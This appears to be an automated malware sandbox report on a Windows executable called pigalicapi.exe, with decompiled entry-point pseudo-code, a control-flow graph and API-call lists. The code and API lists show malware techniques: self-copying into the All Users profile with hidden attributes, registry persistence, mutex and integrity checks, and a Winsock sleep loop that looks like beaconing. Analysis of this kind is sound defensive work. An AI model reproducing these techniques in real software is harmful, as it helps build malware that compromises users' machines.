                                                                                                                                                                                                                                                    • Instruction ID: 0af3fd51622922c43cfd8e9c078a968bf40e0dec3b5fd35707d53bdbc11df6ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3108bbc3739e205df35c35f5d2bf4f9e256e1fbb2f26447d8cea17088821daa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E4118719002189FCB24DB65CE85FEDB7B9AB49304F1051DCEA0DB6191D732AE86CF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 645 ec3b00-ec3b5c call ec1000 call ec3130 call ec2ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call ec4510 654 ec400a-ec400c ExitProcess 645->654 655 ec3b62-ec3c8c call ec7d20 call ec5700 call ec5a00 call ec7d20 call ec9400 call ec99f0 call ec6060 call ec5e00 StrStrIA call ec1120 call ec5e30 call ec6cf0 call ec5f30 call ec9b90 WSAStartup 645->655 655->654 682 ec3c92-ec3cb1 655->682 683 ec3cc0-ec3cc9 682->683 684 ec3cb3-ec3cbb 682->684 685 ec3cda-ec3ce3 683->685 686 ec3ccb-ec3cd4 683->686 684->683 687 ec3cf4-ec3cfd 685->687 688 ec3ce5-ec3cee 685->688 686->685 689 ec3d0c-ec3d15 687->689 690 ec3cff-ec3d07 687->690 688->687 691 ec3d26-ec3d2f 689->691 692 ec3d17-ec3d20 689->692 690->689 693 ec3d40-ec3dfd call ec7d20 call eca700 call eca4b0 call ec5b50 call ec8a70 691->693 694 ec3d31-ec3d3a 691->694 692->691 705 ec3dff-ec3e3f call ec7d20 call ec78d0 693->705 706 ec3e49 693->706 694->693 705->706 708 ec3e53-ec3eab call ec7970 call ec4020 706->708 716 ec3f8a 708->716 717 ec3eb1-ec3ed9 call ec4020 708->717 718 ec3f91-ec3f9a 716->718 725 ec3edf-ec3efa call ec4020 717->725 726 ec3f81 717->726 720 ec3f9c-ec3fa3 718->720 721 ec3fed-ec3ffa Sleep 718->721 723 ec3fa5-ec3fac 720->723 724 ec3fd0-ec3fd7 720->724 721->654 721->708 728 ec3fae-ec3fc2 723->728 729 ec3fc4 723->729 724->721 730 ec3fd9-ec3fe3 724->730 732 ec3eff-ec3f07 725->732 731 ec3f88 726->731 733 ec3fce 728->733 729->733 730->721 731->718 734 ec3f78 732->734 735 ec3f09-ec3f50 call ec42e0 call ec4020 732->735 733->721 737 ec3f7f 734->737 741 ec3f59-ec3f60 735->741 742 ec3f52 735->742 737->731 743 ec3f76 741->743 744 ec3f62-ec3f70 VirtualFree 741->744 742->741 743->737 744->743
                                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                                    			_entry_() {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				char _v1148;
                                                                                                                                                                                                                                                    				signed char _v1149;
                                                                                                                                                                                                                                                    				intOrPtr _v1156;
                                                                                                                                                                                                                                                    				char _v1556;
                                                                                                                                                                                                                                                    				char _v9556;
                                                                                                                                                                                                                                                    				long _v9560;
                                                                                                                                                                                                                                                    				char _v9564;
                                                                                                                                                                                                                                                    				char _v12068;
                                                                                                                                                                                                                                                    				signed int _v12072;
                                                                                                                                                                                                                                                    				char _v12076;
                                                                                                                                                                                                                                                    				long _v12080;
                                                                                                                                                                                                                                                    				char _v12081;
                                                                                                                                                                                                                                                    				long _v12088;
                                                                                                                                                                                                                                                    				long _v12092;
                                                                                                                                                                                                                                                    				long _v12096;
                                                                                                                                                                                                                                                    				signed int _v12100;
                                                                                                                                                                                                                                                    				signed char _v12101;
                                                                                                                                                                                                                                                    				long _v12108;
                                                                                                                                                                                                                                                    				signed int _v12112;
                                                                                                                                                                                                                                                    				void* _v12116;
                                                                                                                                                                                                                                                    				signed char _t69;
                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                    				signed char _t77;
                                                                                                                                                                                                                                                    				signed char _t79;
                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                    				signed char _t85;
                                                                                                                                                                                                                                                    				signed char _t86;
                                                                                                                                                                                                                                                    				signed char _t87;
                                                                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                                                                    				char* _t89;
                                                                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                                                    				signed char _t102;
                                                                                                                                                                                                                                                    				signed char _t104;
                                                                                                                                                                                                                                                    				signed char _t106;
                                                                                                                                                                                                                                                    				signed char _t110;
                                                                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                                                                    				signed int _t118;
                                                                                                                                                                                                                                                    				char _t125;
                                                                                                                                                                                                                                                    				signed int _t138;
                                                                                                                                                                                                                                                    				signed int _t140;
                                                                                                                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                                                                                                                    				signed int _t159;
                                                                                                                                                                                                                                                    				signed int _t161;
                                                                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                                                    				void* _t173;
                                                                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				E00EC1000(0x2f50);
                                                                                                                                                                                                                                                    				_v8 = E00EC3130();
                                                                                                                                                                                                                                                    				E00EC2ED0(_v8);
                                                                                                                                                                                                                                                    				GetModuleFileNameA(0, "C:\Users\jones\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                    				SetUnhandledExceptionFilter(E00EC5DB0); // executed
                                                                                                                                                                                                                                                    				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                    				_t69 = E00EC4510(_v8, 0xed3c88); // executed
                                                                                                                                                                                                                                                    				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                    				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                                                                    					ExitProcess(0);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E00EC7D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                    				E00EC5700( &_v1148); // executed
                                                                                                                                                                                                                                                    				_t143 =  *0xed18a0; // 0xed3b88
                                                                                                                                                                                                                                                    				_t74 = E00EC5A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                    				_v1156 = _t74;
                                                                                                                                                                                                                                                    				E00EC7D20(_t74, "Topdawabe", 0, 0x12c);
                                                                                                                                                                                                                                                    				E00EC9400( &_v1148, "Topdawabe", 0xa); // executed
                                                                                                                                                                                                                                                    				_t77 = E00EC99F0(); // executed
                                                                                                                                                                                                                                                    				 *0xed435a = _t77;
                                                                                                                                                                                                                                                    				 *0xed435d = E00EC6060(); // executed
                                                                                                                                                                                                                                                    				_t79 = E00EC5E00(); // executed
                                                                                                                                                                                                                                                    				 *0xed435e = _t79;
                                                                                                                                                                                                                                                    				_t80 = StrStrIA("C:\Users\jones\pigalicapi.exe", "svchost.exe"); // executed
                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				 *0xed4362 =  ~( ~_t80);
                                                                                                                                                                                                                                                    				E00EC1120("C:\Users\jones\pigalicapi.exe", "pigalicapi",  *0xed435a & 0x000000ff,  *0xed4362 & 0x000000ff, 0xed436c); // executed
                                                                                                                                                                                                                                                    				_t85 = E00EC5E30(0); // executed
                                                                                                                                                                                                                                                    				 *0xed435b = _t85;
                                                                                                                                                                                                                                                    				 *0xed435f = 1; // executed
                                                                                                                                                                                                                                                    				_t86 = E00EC6CF0(); // executed
                                                                                                                                                                                                                                                    				_v1149 = _t86;
                                                                                                                                                                                                                                                    				_t87 = E00EC5F30(); // executed
                                                                                                                                                                                                                                                    				 *0xed435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                    				_t88 = E00EC9B90(0xffffffff);
                                                                                                                                                                                                                                                    				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                    				 *0xed4364 = _t88;
                                                                                                                                                                                                                                                    				_t89 =  &_v1556;
                                                                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                                                                    				_push(0x202); // executed
                                                                                                                                                                                                                                                    				L00ECB1E6(); // executed
                                                                                                                                                                                                                                                    				if(_t89 != 0) {
                                                                                                                                                                                                                                                    					goto L39;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t125 =  *0xed19a8; // 0x1d
                                                                                                                                                                                                                                                    					_v12081 = _t125;
                                                                                                                                                                                                                                                    					 *0xed4378 = 0x10;
                                                                                                                                                                                                                                                    					if(( *0xed435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_t118 =  *0xed4378; // 0x1b
                                                                                                                                                                                                                                                    						 *0xed4378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(( *0xed435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_t161 =  *0xed4378; // 0x1b
                                                                                                                                                                                                                                                    						 *0xed4378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(( *0xed435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_t140 =  *0xed4378; // 0x1b
                                                                                                                                                                                                                                                    						 *0xed4378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(( *0xed435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_t116 =  *0xed4378; // 0x1b
                                                                                                                                                                                                                                                    						 *0xed4378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(( *0xed4360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_t159 =  *0xed4378; // 0x1b
                                                                                                                                                                                                                                                    						 *0xed4378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t91 =  *0xed4361 & 0x000000ff;
                                                                                                                                                                                                                                                    					if(( *0xed4361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_t138 =  *0xed4378; // 0x1b
                                                                                                                                                                                                                                                    						 *0xed4378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                    					E00EC7D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                    					E00ECA700();
                                                                                                                                                                                                                                                    					E00ECA4B0( &_v12068,  &_v9564, 0xed3cb6,  *0xed3cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                    					_v9560 = 0;
                                                                                                                                                                                                                                                    					_t97 = E00EC5B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                    					_v12072 = _t97;
                                                                                                                                                                                                                                                    					_v12092 = 0;
                                                                                                                                                                                                                                                    					_v12080 = 0;
                                                                                                                                                                                                                                                    					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                    					_t98 = E00EC8A70(0xed2c34,  &_v12076, 0xed2ba8, 0x8c, 0xece008, 0x254); // executed
                                                                                                                                                                                                                                                    					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                    					if(_t98 != 0) {
                                                                                                                                                                                                                                                    						E00EC7D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                    						E00EC78D0(0xed2c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                    						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                    						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                    						_v12080 = 0xc8;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v12088 = 0;
                                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                                    					_v12101 = 0;
                                                                                                                                                                                                                                                    					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                    					_v12096 = 0;
                                                                                                                                                                                                                                                    					_t100 = E00EC7970( &_v12096); // executed
                                                                                                                                                                                                                                                    					_v12100 = _t100;
                                                                                                                                                                                                                                                    					_t102 = E00EC4020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                    					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                    					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_v12101 = 1;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t104 = E00EC4020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                    						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                    						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    							_v12101 = 1;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_t106 = E00EC4020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                    							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                    							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    								_v12101 = 1;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v12116 = 0;
                                                                                                                                                                                                                                                    								_v12112 = E00EC42E0( &_v12116);
                                                                                                                                                                                                                                                    								_t110 = E00EC4020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                    								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                    								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    									_v12101 = 1;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(_v12116 != 0) {
                                                                                                                                                                                                                                                    									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						if( *0xed18a4 != 1) {
                                                                                                                                                                                                                                                    							if( *0xed18a4 == 2) {
                                                                                                                                                                                                                                                    								 *0xed18a4 = 1;
                                                                                                                                                                                                                                                    								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							if( *0xed30e4 != 2) {
                                                                                                                                                                                                                                                    								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                    								 *0xed18a4 = 2;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}





















































                                                                                                                                                                                                                                                    0x00ec3b08
                                                                                                                                                                                                                                                    0x00ec3b12
                                                                                                                                                                                                                                                    0x00ec3b19
                                                                                                                                                                                                                                                    0x00ec3b2d
                                                                                                                                                                                                                                                    0x00ec3b38
                                                                                                                                                                                                                                                    0x00ec3b40
                                                                                                                                                                                                                                                    0x00ec3b4f
                                                                                                                                                                                                                                                    0x00ec3b54
                                                                                                                                                                                                                                                    0x00ec3b5c
                                                                                                                                                                                                                                                    0x00ec400a
                                                                                                                                                                                                                                                    0x00ec400c
                                                                                                                                                                                                                                                    0x00ec400c
                                                                                                                                                                                                                                                    0x00ec3b70
                                                                                                                                                                                                                                                    0x00ec3b7f
                                                                                                                                                                                                                                                    0x00ec3b8c
                                                                                                                                                                                                                                                    0x00ec3b9a
                                                                                                                                                                                                                                                    0x00ec3ba2
                                                                                                                                                                                                                                                    0x00ec3bb4
                                                                                                                                                                                                                                                    0x00ec3bca
                                                                                                                                                                                                                                                    0x00ec3bd2
                                                                                                                                                                                                                                                    0x00ec3bd7
                                                                                                                                                                                                                                                    0x00ec3be1
                                                                                                                                                                                                                                                    0x00ec3be6
                                                                                                                                                                                                                                                    0x00ec3beb
                                                                                                                                                                                                                                                    0x00ec3bfa
                                                                                                                                                                                                                                                    0x00ec3c02
                                                                                                                                                                                                                                                    0x00ec3c06
                                                                                                                                                                                                                                                    0x00ec3c2a
                                                                                                                                                                                                                                                    0x00ec3c34
                                                                                                                                                                                                                                                    0x00ec3c3c
                                                                                                                                                                                                                                                    0x00ec3c41
                                                                                                                                                                                                                                                    0x00ec3c48
                                                                                                                                                                                                                                                    0x00ec3c4d
                                                                                                                                                                                                                                                    0x00ec3c53
                                                                                                                                                                                                                                                    0x00ec3c64
                                                                                                                                                                                                                                                    0x00ec3c6c
                                                                                                                                                                                                                                                    0x00ec3c71
                                                                                                                                                                                                                                                    0x00ec3c74
                                                                                                                                                                                                                                                    0x00ec3c79
                                                                                                                                                                                                                                                    0x00ec3c7f
                                                                                                                                                                                                                                                    0x00ec3c80
                                                                                                                                                                                                                                                    0x00ec3c85
                                                                                                                                                                                                                                                    0x00ec3c8c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec3c92
                                                                                                                                                                                                                                                    0x00ec3c92
                                                                                                                                                                                                                                                    0x00ec3c98
                                                                                                                                                                                                                                                    0x00ec3c9e
                                                                                                                                                                                                                                                    0x00ec3cb1
                                                                                                                                                                                                                                                    0x00ec3cb3
                                                                                                                                                                                                                                                    0x00ec3cbb
                                                                                                                                                                                                                                                    0x00ec3cbb
                                                                                                                                                                                                                                                    0x00ec3cc9
                                                                                                                                                                                                                                                    0x00ec3ccb
                                                                                                                                                                                                                                                    0x00ec3cd4
                                                                                                                                                                                                                                                    0x00ec3cd4
                                                                                                                                                                                                                                                    0x00ec3ce3
                                                                                                                                                                                                                                                    0x00ec3ce5
                                                                                                                                                                                                                                                    0x00ec3cee
                                                                                                                                                                                                                                                    0x00ec3cee
                                                                                                                                                                                                                                                    0x00ec3cfd
                                                                                                                                                                                                                                                    0x00ec3cff
                                                                                                                                                                                                                                                    0x00ec3d07
                                                                                                                                                                                                                                                    0x00ec3d07
                                                                                                                                                                                                                                                    0x00ec3d15
                                                                                                                                                                                                                                                    0x00ec3d17
                                                                                                                                                                                                                                                    0x00ec3d20
                                                                                                                                                                                                                                                    0x00ec3d20
                                                                                                                                                                                                                                                    0x00ec3d26
                                                                                                                                                                                                                                                    0x00ec3d2f
                                                                                                                                                                                                                                                    0x00ec3d31
                                                                                                                                                                                                                                                    0x00ec3d3a
                                                                                                                                                                                                                                                    0x00ec3d3a
                                                                                                                                                                                                                                                    0x00ec3d40
                                                                                                                                                                                                                                                    0x00ec3d58
                                                                                                                                                                                                                                                    0x00ec3d60
                                                                                                                                                                                                                                                    0x00ec3d80
                                                                                                                                                                                                                                                    0x00ec3d88
                                                                                                                                                                                                                                                    0x00ec3da7
                                                                                                                                                                                                                                                    0x00ec3daf
                                                                                                                                                                                                                                                    0x00ec3db5
                                                                                                                                                                                                                                                    0x00ec3dbf
                                                                                                                                                                                                                                                    0x00ec3dc9
                                                                                                                                                                                                                                                    0x00ec3df3
                                                                                                                                                                                                                                                    0x00ec3df8
                                                                                                                                                                                                                                                    0x00ec3dfd
                                                                                                                                                                                                                                                    0x00ec3e0d
                                                                                                                                                                                                                                                    0x00ec3e2b
                                                                                                                                                                                                                                                    0x00ec3e30
                                                                                                                                                                                                                                                    0x00ec3e39
                                                                                                                                                                                                                                                    0x00ec3e3f
                                                                                                                                                                                                                                                    0x00ec3e3f
                                                                                                                                                                                                                                                    0x00ec3e49
                                                                                                                                                                                                                                                    0x00ec3e53
                                                                                                                                                                                                                                                    0x00ec3e53
                                                                                                                                                                                                                                                    0x00ec3e5a
                                                                                                                                                                                                                                                    0x00ec3e64
                                                                                                                                                                                                                                                    0x00ec3e75
                                                                                                                                                                                                                                                    0x00ec3e7d
                                                                                                                                                                                                                                                    0x00ec3e9e
                                                                                                                                                                                                                                                    0x00ec3ea3
                                                                                                                                                                                                                                                    0x00ec3eab
                                                                                                                                                                                                                                                    0x00ec3f8a
                                                                                                                                                                                                                                                    0x00ec3eb1
                                                                                                                                                                                                                                                    0x00ec3ecc
                                                                                                                                                                                                                                                    0x00ec3ed1
                                                                                                                                                                                                                                                    0x00ec3ed9
                                                                                                                                                                                                                                                    0x00ec3f81
                                                                                                                                                                                                                                                    0x00ec3edf
                                                                                                                                                                                                                                                    0x00ec3efa
                                                                                                                                                                                                                                                    0x00ec3eff
                                                                                                                                                                                                                                                    0x00ec3f07
                                                                                                                                                                                                                                                    0x00ec3f78
                                                                                                                                                                                                                                                    0x00ec3f09
                                                                                                                                                                                                                                                    0x00ec3f09
                                                                                                                                                                                                                                                    0x00ec3f22
                                                                                                                                                                                                                                                    0x00ec3f43
                                                                                                                                                                                                                                                    0x00ec3f48
                                                                                                                                                                                                                                                    0x00ec3f50
                                                                                                                                                                                                                                                    0x00ec3f52
                                                                                                                                                                                                                                                    0x00ec3f52
                                                                                                                                                                                                                                                    0x00ec3f60
                                                                                                                                                                                                                                                    0x00ec3f70
                                                                                                                                                                                                                                                    0x00ec3f70
                                                                                                                                                                                                                                                    0x00ec3f76
                                                                                                                                                                                                                                                    0x00ec3f7f
                                                                                                                                                                                                                                                    0x00ec3f88
                                                                                                                                                                                                                                                    0x00ec3f9a
                                                                                                                                                                                                                                                    0x00ec3fa3
                                                                                                                                                                                                                                                    0x00ec3fd7
                                                                                                                                                                                                                                                    0x00ec3fd9
                                                                                                                                                                                                                                                    0x00ec3fe3
                                                                                                                                                                                                                                                    0x00ec3fe3
                                                                                                                                                                                                                                                    0x00ec3fa5
                                                                                                                                                                                                                                                    0x00ec3fac
                                                                                                                                                                                                                                                    0x00ec3fc4
                                                                                                                                                                                                                                                    0x00ec3fae
                                                                                                                                                                                                                                                    0x00ec3fae
                                                                                                                                                                                                                                                    0x00ec3fb8
                                                                                                                                                                                                                                                    0x00ec3fb8
                                                                                                                                                                                                                                                    0x00ec3fce
                                                                                                                                                                                                                                                    0x00ec3fa3
                                                                                                                                                                                                                                                    0x00ec3ff4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec3ff4

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 00EC3B2D
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00EC5DB0), ref: 00EC3B38
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00EC3B40
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 00EC456C
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EC458B
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4510: GetFileSize.KERNEL32(000000FF,00000000), ref: 00EC45AD
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC45D6
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00EC4617
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EC463E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC47C0
                                                                                                                                                                                                                                                      • Part of subcall function 00EC4510: CloseHandle.KERNEL32(00000000), ref: 00EC47E0
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00EC400C
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 00EC5742
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 00EC57B8
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 00EC57F1
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5700: wnsprintfA.SHLWAPI ref: 00EC582F
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EC5854
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5700: GetFileSize.KERNEL32(000000FF,00000000), ref: 00EC586D
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: lstrcpyA.KERNEL32(Ackxwgsxooono,WDefault), ref: 00EC5A47
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: lstrlenA.KERNEL32(00ECC4E0), ref: 00EC5A7D
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: lstrcpyA.KERNEL32(00000000,00ECC4E0), ref: 00EC5A97
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: lstrlenA.KERNEL32(00000000), ref: 00EC5AA1
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: lstrlenA.KERNEL32(Ackxwgsxooono), ref: 00EC5AAE
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: lstrcatA.KERNEL32(00000000,Ackxwgsxooono), ref: 00EC5AC8
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00EC5B00
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: RegCloseKey.KERNEL32(00000000), ref: 00EC5B0E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5A00: lstrlenA.KERNEL32(00000000), ref: 00EC5B3B
                                                                                                                                                                                                                                                      • Part of subcall function 00EC9400: lstrcpyA.KERNEL32(?,00000000), ref: 00EC9513
                                                                                                                                                                                                                                                      • Part of subcall function 00EC9400: CharUpperA.USER32(?), ref: 00EC9521
                                                                                                                                                                                                                                                      • Part of subcall function 00EC99F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 00EC9A0A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC99F0: OpenProcessToken.ADVAPI32(00000000), ref: 00EC9A11
                                                                                                                                                                                                                                                      • Part of subcall function 00EC99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00EC9A3A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 00EC9A77
                                                                                                                                                                                                                                                      • Part of subcall function 00EC99F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 00EC9AAD
                                                                                                                                                                                                                                                      • Part of subcall function 00EC99F0: EqualSid.ADVAPI32(?,00000000), ref: 00EC9AC3
                                                                                                                                                                                                                                                      • Part of subcall function 00EC6060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00EC6082
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,00EC3BEB), ref: 00EC5E0C
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5E00: GetLastError.KERNEL32(?,00EC3BEB), ref: 00EC5E12
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 00EC3BFA
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: lstrlenA.KERNEL32(00000000), ref: 00EC1148
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: lstrlenA.KERNEL32(00000000), ref: 00EC115A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 00EC1182
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: wnsprintfA.SHLWAPI ref: 00EC11BD
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: lstrcmpiA.KERNEL32(00000104,?), ref: 00EC11D1
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 00EC11F0
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: SetFileAttributesA.KERNEL32(?,00000006), ref: 00EC11FF
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: lstrcpyA.KERNEL32(00000104,?), ref: 00EC1210
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: lstrcpyA.KERNEL32(00000000,?), ref: 00EC1249
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 00EC125D
                                                                                                                                                                                                                                                      • Part of subcall function 00EC1120: CreateThread.KERNEL32 ref: 00EC1274
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 00EC5E7E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 00EC5EB2
                                                                                                                                                                                                                                                      • Part of subcall function 00EC5E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 00EC5ED6
